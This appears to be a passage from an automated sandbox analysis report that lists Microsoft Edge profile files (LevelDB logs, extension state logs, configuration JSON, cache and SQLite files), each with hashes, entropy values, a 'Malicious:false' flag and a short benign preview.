                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                                            MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                                            SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                                            SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                                            SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\domains_config.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                                                                                                                                            Size (bytes):358860
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.32461301038395
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6Rf:C1gAg1zfvH
                                                                                                                                                                                                                                                                                                                            MD5:13830F2AC4F461AB1AECF0F7236D7917
                                                                                                                                                                                                                                                                                                                            SHA1:8980972F0FCAF2C2E8E349E0A1FA957819673862
                                                                                                                                                                                                                                                                                                                            SHA-256:382D16E47B534F387C8A9FBE421056E9BE55DA5159E9D398015E252519E4EA79
                                                                                                                                                                                                                                                                                                                            SHA-512:5450245C85E6F18C3E437658C54C3309A1E439C6F603D9A99385807059553F424A91D62589C738824B8799D95414BAD7D2F3A5BCA497D22AF69D9FB4D4F20236
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"aee_config":{"ar":{"price_regex":{"ae":"(((ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)))","dz":"(((dzd|da|\\x{062F}\\x{062C})\\s*\\d{1,3})|(\\d{1,3}\\s*(dzd|da|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}|egp)\\s*\\d{1,3})|(\\d{1,3}\\s*(e\\x{00a3}|egp)))","ma":"(((mad|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(mad|dhs|dh)))","sa":"((\\d{1,3}\\s*(sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633}))|((sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633})\\s*\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})|(\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\000003.log

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):418
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                                                            MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                                                            SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                                                            SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                                                            SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):328
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.129207364046255
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:6:iOHf/J5Iq2PN723oH+Tcwt8aPrqIFUttf4XZmwDf4FkwON723oH+Tcwt8amLJ:7/RKvVaYebL3FUt94X/z4F5OaYebQJ
                                                                                                                                                                                                                                                                                                                            MD5:079558D2742CF315611C57083B9AB7AA
                                                                                                                                                                                                                                                                                                                            SHA1:8F5B470BA6693412CF1D880DFBFCC61D1E18C8B9
                                                                                                                                                                                                                                                                                                                            SHA-256:C6B3B6DBCB083AF2187B0A56DAE9EACB7F76C3763302B5031918F7B469159B7E
                                                                                                                                                                                                                                                                                                                            SHA-512:E215AD784BD6F443BB75C14921AB2437EEBB7F80153809DADC7BD75675B4BCC6F3F69901C5577B35CC360F9D8E04E05E2127DE80853CC3A23F1B062685452F92
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:2025/01/05-02:39:15.415 1cd0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2025/01/05-02:39:15.416 1cd0 Recovering log #3.2025/01/05-02:39:15.416 1cd0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):328
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.129207364046255
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:6:iOHf/J5Iq2PN723oH+Tcwt8aPrqIFUttf4XZmwDf4FkwON723oH+Tcwt8amLJ:7/RKvVaYebL3FUt94X/z4F5OaYebQJ
                                                                                                                                                                                                                                                                                                                            MD5:079558D2742CF315611C57083B9AB7AA
                                                                                                                                                                                                                                                                                                                            SHA1:8F5B470BA6693412CF1D880DFBFCC61D1E18C8B9
                                                                                                                                                                                                                                                                                                                            SHA-256:C6B3B6DBCB083AF2187B0A56DAE9EACB7F76C3763302B5031918F7B469159B7E
                                                                                                                                                                                                                                                                                                                            SHA-512:E215AD784BD6F443BB75C14921AB2437EEBB7F80153809DADC7BD75675B4BCC6F3F69901C5577B35CC360F9D8E04E05E2127DE80853CC3A23F1B062685452F92
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:2025/01/05-02:39:15.415 1cd0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2025/01/05-02:39:15.416 1cd0 Recovering log #3.2025/01/05-02:39:15.416 1cd0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\000003.log

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):418
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                                                            MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                                                            SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                                                            SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                                                            SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):332
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.135921156939598
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:6:iOHfrq2PN723oH+Tcwt865IFUttfzpZmwDfzjkwON723oH+Tcwt86+ULJ:7/rvVaYeb/WFUt9V/zH5OaYeb/+SJ
                                                                                                                                                                                                                                                                                                                            MD5:A8A85F326A146FB1C5EC4976B828FC16
                                                                                                                                                                                                                                                                                                                            SHA1:664A276113449E171FD26BFAB2011F352888FC00
                                                                                                                                                                                                                                                                                                                            SHA-256:323041374863C5DFC2AD031B541976521E822DF20736D3FEAFC289E7832213BB
                                                                                                                                                                                                                                                                                                                            SHA-512:0E6D0DA217B3452813A589CCF622455A961E353141F8119F97E820FC7B43AA8DC9453E65ED1D11A7EDAF65D4E46A75DE36F3AD098378425029AC1FB6FCD96210
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:2025/01/05-02:39:15.418 1cd0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2025/01/05-02:39:15.419 1cd0 Recovering log #3.2025/01/05-02:39:15.419 1cd0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):332
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.135921156939598
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:6:iOHfrq2PN723oH+Tcwt865IFUttfzpZmwDfzjkwON723oH+Tcwt86+ULJ:7/rvVaYeb/WFUt9V/zH5OaYeb/+SJ
                                                                                                                                                                                                                                                                                                                            MD5:A8A85F326A146FB1C5EC4976B828FC16
                                                                                                                                                                                                                                                                                                                            SHA1:664A276113449E171FD26BFAB2011F352888FC00
                                                                                                                                                                                                                                                                                                                            SHA-256:323041374863C5DFC2AD031B541976521E822DF20736D3FEAFC289E7832213BB
                                                                                                                                                                                                                                                                                                                            SHA-512:0E6D0DA217B3452813A589CCF622455A961E353141F8119F97E820FC7B43AA8DC9453E65ED1D11A7EDAF65D4E46A75DE36F3AD098378425029AC1FB6FCD96210
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:2025/01/05-02:39:15.418 1cd0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2025/01/05-02:39:15.419 1cd0 Recovering log #3.2025/01/05-02:39:15.419 1cd0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1254
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
                                                                                                                                                                                                                                                                                                                            MD5:826B4C0003ABB7604485322423C5212A
                                                                                                                                                                                                                                                                                                                            SHA1:6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
                                                                                                                                                                                                                                                                                                                            SHA-256:C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
                                                                                                                                                                                                                                                                                                                            SHA-512:0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):328
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.093662902844935
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:6:iOHD9yq2PN723oH+Tcwt8NIFUttDr1ZmwDD9RkwON723oH+Tcwt8+eLJ:7EvVaYebpFUtR1/75OaYebqJ
                                                                                                                                                                                                                                                                                                                            MD5:05C92A669EFF4D711B39DB15EB81A0C4
                                                                                                                                                                                                                                                                                                                            SHA1:63A8D4634C3903AC7658A8E012073827594B9D84
                                                                                                                                                                                                                                                                                                                            SHA-256:5FDA8DE3803FAF1403AE475B62E23D35B17906DB447AA7117EF9473B2531E6C4
                                                                                                                                                                                                                                                                                                                            SHA-512:F77750DF26F586C7E00B61F553381E9475B9A988CFAADDFD230CC44F1EFD34126E1E7C2A657EA1370897E4EE439310AD937B4B82D9A48B000932C5F7BF3CDD9D
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:2025/01/05-02:39:16.209 1dc0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2025/01/05-02:39:16.209 1dc0 Recovering log #3.2025/01/05-02:39:16.209 1dc0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):328
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.093662902844935
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:6:iOHD9yq2PN723oH+Tcwt8NIFUttDr1ZmwDD9RkwON723oH+Tcwt8+eLJ:7EvVaYebpFUtR1/75OaYebqJ
                                                                                                                                                                                                                                                                                                                            MD5:05C92A669EFF4D711B39DB15EB81A0C4
                                                                                                                                                                                                                                                                                                                            SHA1:63A8D4634C3903AC7658A8E012073827594B9D84
                                                                                                                                                                                                                                                                                                                            SHA-256:5FDA8DE3803FAF1403AE475B62E23D35B17906DB447AA7117EF9473B2531E6C4
                                                                                                                                                                                                                                                                                                                            SHA-512:F77750DF26F586C7E00B61F553381E9475B9A988CFAADDFD230CC44F1EFD34126E1E7C2A657EA1370897E4EE439310AD937B4B82D9A48B000932C5F7BF3CDD9D
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:2025/01/05-02:39:16.209 1dc0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2025/01/05-02:39:16.209 1dc0 Recovering log #3.2025/01/05-02:39:16.209 1dc0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\_metadata\computed_hashes.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):429
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.809210454117189
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                                                                                                                                                                            MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                                                                                                                                                                            SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                                                                                                                                                                            SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                                                                                                                                                                            SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_1

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                                                                                                                                            Size (bytes):270336
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):0.0018062632662178783
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:MsEllllkEthXllkl2zEZlS1FT:/M/xT02zF1V
                                                                                                                                                                                                                                                                                                                            MD5:991E70F845F3780418412CFCA85812A0
                                                                                                                                                                                                                                                                                                                            SHA1:DA09FF745EF62A49E1344245694208F27A9A64C7
                                                                                                                                                                                                                                                                                                                            SHA-256:C81BDF7309EC4828CAF0E6E3017E1DB0BD91B02309F4A630E37B322A315656D5
                                                                                                                                                                                                                                                                                                                            SHA-512:0CCB5AD20E9A97A32EF6B7F57B710346DAEBFA33D1763FCB50B51C01F9CC28CC8702C33E95D80178BBD22649AA67CC1DD675095CCDFD0272E59EB5F0D49E9DAF
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps (copy)

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):115717
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                                                            MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                                                            SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                                                            SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                                                            SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps Icons

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 12, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):49152
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):3.647685644454233
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:384:aj9P0ycSQkQerR773pLQP/KbtzjlGhCgam6ItRKToaAu:adYSe2R7KP/YlGv9RKcC
                                                                                                                                                                                                                                                                                                                            MD5:91EACC3AB20EA23D2CFCBA4729A4D44A
                                                                                                                                                                                                                                                                                                                            SHA1:9F128ACB51A722BF47B1D114D3796C6D36085639
                                                                                                                                                                                                                                                                                                                            SHA-256:4078481172DB3C7C9B94F85C5E6B2C05482370C5004FCA0E40B65B536B78B129
                                                                                                                                                                                                                                                                                                                            SHA-512:69020E4842878991D4CB4A97B134CAFFABF4D7AA6738299A66D58516EF29F35D95FA341B5BA975E31F4750C067B2C8FD92E2DC260AA8407EF3C52E3E5F1C5898
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):412
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.236978083618923
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:12:7zEFOvVaYeb8rcHEZrELFUtx1//n5OaYeb8rcHEZrEZSJ:7zEKVaYeb8nZrExgxx5OaYeb8nZrEZe
                                                                                                                                                                                                                                                                                                                            MD5:DCDD97362A054350D105F165ACBBBFDE
                                                                                                                                                                                                                                                                                                                            SHA1:5089AD9974CC85E46B2F625A8075B6E0B724BE61
                                                                                                                                                                                                                                                                                                                            SHA-256:79396F48389C261E178ECAE239B0A7A6173F5E36FD0BD89B82D60A3010ADD18C
                                                                                                                                                                                                                                                                                                                            SHA-512:0903ACC9F013090A4C126922440572CC895E4DD6B6F4146E5989259BDDE665A2DD4983D22CB13012E1EF6F2ED1463DF165CA52D9CA97BBD54ABE15EFB326B43F
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:2025/01/05-02:39:19.737 1de0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2025/01/05-02:39:19.738 1de0 Recovering log #3.2025/01/05-02:39:19.738 1de0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                            Download File
